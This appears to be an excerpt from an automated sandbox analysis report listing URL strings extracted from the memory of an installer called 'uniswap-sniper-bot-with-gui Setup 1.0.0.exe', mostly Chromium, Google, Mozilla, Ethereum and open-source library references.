Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/644669
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/650547
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/672380
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/709351
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/797243
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/809422
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/830046
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/849576
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/883276
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/927470
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/941620
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/941620allow_translate_uniform_block_to_structured_bufferThere
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895276586.0000000005720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://docs.python.org/library/uuid.html
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://dominictarr.com)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/common
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/commonnode-set../../third_party/blink/renderer/core/xml/xslt_extensions.ccxsltNewSe
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://fian.my.id/Waves
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://frozeman.de
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://gavwood.com
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://icl.com/saxon
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://icl.com/saxonorg.apache.xalan.xslt.extensions.RedirectxsltDocumentElem:
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://issuetracker.google.com/173636783
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://issuetracker.google.com/200067929
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://jaredwray.com)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ljharb.codes
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://lukechilds.co.uk)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://materializecss.com)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000000.1784465935.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895276586.0000000005720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://pajhome.org.uk/crypt/md5
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://stackoverflow.com/a/16459606/376773
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://stackoverflow.com/a/398120/376773
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://stackoverflow.com/a/5982798/376773
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://stackoverflow.com/questions/4823468/store-comments-in-markdown-syntax)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://swarm-gateways.net
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://web3js.readthedocs.io/en/1.0/web3-eth-accounts.html
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://wpad/wpad.dat
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://wpad/wpad.dat../../net/proxy_resolution/pac_file_decider.ccDoWaitDoQuickCheck../../net/proxy_
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://wpad/wpad.dat../../net/proxy_resolution/win/proxy_config_service_win.cc~ProxyConfigServiceWin
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895276586.0000000005720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1996793114.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895276586.0000000005720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.gnu.org/licenses/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.jclark.com/xt
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895276586.0000000005720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.movable-type.co.uk/scripts/sha1.html
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1853457919.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.unicode.org/copyright.html
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xmlsoft.org/XSLT/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xmlsoft.org/XSLT/namespace
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xmlsoft.org/XSLT/namespacehttp://www.jclark.com/xtxsl:key
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xmlsoft.org/XSLT/xsltNewExtDef
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://1.1.1.1:443
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://android.com/pay
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4674
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4849
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5140
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5536
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons.gcp.gvt2.com/domainreliability/upload
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons.gcp.gvt2.com/domainreliability/uploadhttps://beacons.gvt2.com/domainreliability/uplo
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons.gvt2.com/domainreliability/upload
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons2.gvt2.com/domainreliability/upload
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons3.gvt2.com/domainreliability/upload
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons4.gvt2.com/domainreliability/upload
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons5.gvt2.com/domainreliability/upload
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons5.gvt3.com/domainreliability/upload
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895042963.0000000004F20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beastacademy.com/checkout/cart/?$
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bit.ly/3rpDuEX.
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bit.ly/3rpDuEX.WebBundleURLLoaderFactory::OnResponseParsedInvalid
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bit.ly/audio-worklet)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bit.ly/audio-worklet)ScriptProcessorHandler::ProcessScriptProcessorHandler::Process
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://blog.soliditylang.org/2021/04/21/custom-errors/)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895276586.0000000005720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://blueimp.net
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://c.android.clients.google.com/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://c.bigcache.googleapis.com/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://c.doc-0-0-sj.sj.googleusercontent.com/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://c.docs.google.com/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://c.drive.google.com/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://c.googlesyndication.com/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://c.pack.google.com/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://c.play.google.com/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://c.youtube.com/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cats.com
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cats.com/unicorn
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromium.googlesource.com/angle/angle/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromium.googlesource.com/chromium/src/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/domainreliability/upload
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1042393
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1046462
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1060012
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1091824
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1137851
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1144908
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1144908.
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1144908.The
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1144908Changing
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1154140
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1300575
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/593024
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/593024select_view_in_geometry_shaderThe
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/650547
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/650547call_clear_twiceUsing
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/655534
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/655534use_system_memory_for_constant_buffersCopying
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/705865
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/710443
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/811661
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/824383
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/824647
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/848952
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/927119
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/927119../../third_party/blink/renderer/core/script/script_loader.ccPrepareScriptEx
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://datatracker.ietf.org/doc/draft-ietf-rtcweb-ip-handling.
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Tools/Web_Console#Styling_messages
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/CloseEvent/code
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/FormData)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/WebSocket/close
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/Web_Storage_API/Using_the_Web_Storage_API#Feature-d
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest/responseXML.
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/fetch#credentials
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/Data_URIs
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Retry-After)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.ens.domains/contract-developer-guide/writing-a-resolver
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.ens.domains/ens-deployments
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.soliditylang.org/en/develop/abi-spec.html#json
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.soliditylang.org/en/latest/abi-spec.html#errors
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.soliditylang.org/en/latest/abi-spec.html#json
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.web3js.org/guides/web3_upgrade_guide/x/web3_utils_migration_guide#conversion-to-hex)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://domenic.me/)
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895487723.0000000005C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://eips.ethereum.org/EIPS/eip-1193).
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://eips.ethereum.org/EIPS/eip-1559
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://eth.wiki/json-rpc/API#net_listening
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://eth.wiki/json-rpc/API#net_peercount
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://eth.wiki/json-rpc/API#net_version
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1895700933.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ethdocs.org/en/latest/ether.html
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1999889491.0000000006EB9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://example.org
